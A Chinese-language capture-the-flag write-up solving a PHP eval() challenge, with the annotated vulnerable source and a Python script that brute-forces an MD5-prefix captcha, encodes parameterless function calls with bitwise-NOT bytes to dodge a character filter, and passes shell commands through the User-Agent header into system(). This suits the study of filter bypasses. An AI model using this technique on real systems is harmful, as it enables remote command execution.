题目链接

源码提示有swp,访问.index.php.swp成功下载得到

<?php
// Challenge source recovered from the .index.php.swp file; review comments added.
session_start();
// Captcha seed: only the first 5 hex characters (20 bits) of an MD5 digest are
// kept, which is what makes the brute force described in the write-up feasible.
// NOTE: `sha1(mt_rand)` passes the bare name mt_rand, not a call. PHP 7 treats an
// undefined constant as the string "mt_rand" (with a warning); PHP 8 raises an
// Error. Presumably a typo for mt_rand().
if(!isset($_SESSION['code'])){
$_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
}

if(isset($_POST['cmd']) and isset($_POST['code'])){
// Captcha check: the submitted value is accepted if the first 5 hex chars of its
// MD5 match the session code. Any preimage of that short prefix is enough.
if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
die('<script>alert(\'Captcha error~\');history.back()</script>');
}
// A fresh code is issued after each accepted POST, so every accepted request
// needs its own captcha solution.
$_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
$code = $_POST['cmd'];
// Input gate for eval(): a 70-byte length cap plus a deny-list regex (letters,
// digits and most ASCII punctuation). Deny-listing characters in front of
// eval() is the core weakness here: anything the list omits still reaches eval().
if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
die('<script>alert(\'Longlone not like you~\');history.back()</script>');
// Structural check: strip `token(...)` where the parentheses hold nothing or
// another such call ((?R) recurses the whole pattern). Only input that collapses
// to exactly ";" passes, i.e. argument-less (possibly nested) calls followed by
// a single semicolon -- the "parameterless function" pattern the write-up cites.
}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
// eval() of request-controlled input with error reporting suppressed; the two
// checks above are the only protection in front of it.
@eval($code);
die();
}
}
?>

发现有md5前5位比对校验，且当前$_SESSION['code']在页面中也有展现，因此可以爆破，然后就是无参函数构造了。

爆破哈希可以查看生日攻击:哈希碰撞与生日攻击 - 阮一峰的网络日志 (ruanyifeng.com)

无参函数构造可见:https://antel0p3.github.io/2023/09/26/HNCTF2022-Canyource-wp/

import hashlib
import math
import requests
import re

def one(s):
    """Encode token *s* as the byte fragment ``[~<complement of s>][~\\xCF](``.

    Every character of *s* is replaced by its complement byte
    (``255 - ord(c)``), so the returned fragment carries none of the
    original letters or digits; applying PHP's ``~`` to the bracketed
    literal on the receiving side yields the original token again.

    Raises OverflowError if *s* contains a code point above 255.
    """
    complemented = b"".join(
        (255 - ord(ch)).to_bytes(1, "little") for ch in s
    )
    return b"[~" + complemented + b"][~\xCF]("
def get_not(a):
    """Encode a call chain such as ``"f(g());"`` via :func:`one`.

    *a* is split on ``(``; each piece except the last is treated as the
    name of a call and passed through :func:`one`. One ``)`` per call is
    appended, then ``;``. Whatever follows the final ``(`` in *a*
    (normally ``");"``) is dropped.
    """
    names = a.split("(")[:-1]
    body = b"".join(one(name) for name in names)
    return body + b")" * len(names) + b";"

url = 'http://node4.anna.nssctf.cn:28583/'
sess = requests.session() # one Session object keeps the cookie jar, so the server-side PHP session (and its captcha code) persists across requests
res = sess.get(url=url)
sum = re.findall(',0,5[)]==(.....)', res.text)[0] # the page echoes the current 5-char code after ",0,5)=="; IndexError if that text is absent. NOTE: shadows the builtin sum()
print(sum)

code = ''  # stays '' when no preimage is found below; the following POST then fails the captcha check
for i in range(800000): # search for a decimal string whose MD5 starts with the 5 hex chars (20 bits) shown by the page; 800000 candidates cover ~76% of the 2^20 prefixes, so a run succeeds only about half the time and otherwise has to be repeated
md5 = hashlib.md5(str(i).encode())
if md5.hexdigest()[:5] == sum:
print(i)
code = i  # int; requests sends it as the same decimal string that was hashed
break
res = sess.post(url=url, data={"cmd":get_not('phpinfo();'), "code":code})  # first accepted request; per the recovered source, the server rotates the captcha code once this POST passes the check
print(res.text)

成功获取到phpinfo结果，渲染后查看，disable_functions中没有禁用函数。

# NOTE(review): the recovered source sets a new $_SESSION['code'] after every accepted POST, so reusing the `code` found earlier presumably only works if the hash search was re-run first -- confirm against the actual flow
res = sess.post(url=url, data={"cmd":get_not('print_r(getallheaders());'), "code":code})
# Array (
# [Host] => node4.anna.nssctf.cn:28583
# [User-Agent] => python-requests/2.31.0
# ...)
headers = {"User-Agent": "ls"}	# the command string travels in a request header rather than in the filtered POST body
res = sess.post(url=url, headers=headers, data={"cmd":get_not('print_r(getallheaders());'), "code":code})
# Array (
# [Host] => node4.anna.nssctf.cn:28583
# [User-Agent] => ls
# ...)
headers = {"User-Agent": "ls"}
res = sess.post(url=url, headers=headers, data={"cmd":get_not('print_r(next(getallheaders()));'), "code":code})  # PHP next() advances past the first header (Host) and returns the second; this relies on the header order observed above, not on a guarantee
# ls
headers = {"User-Agent": "ls /;cat /fll*"}
res = sess.post(url=url, headers=headers, data={"cmd":get_not('system(next(getallheaders()));'), "code":code})  # system() is reachable because disable_functions was found empty in the phpinfo step above
# flll1114gggggg ...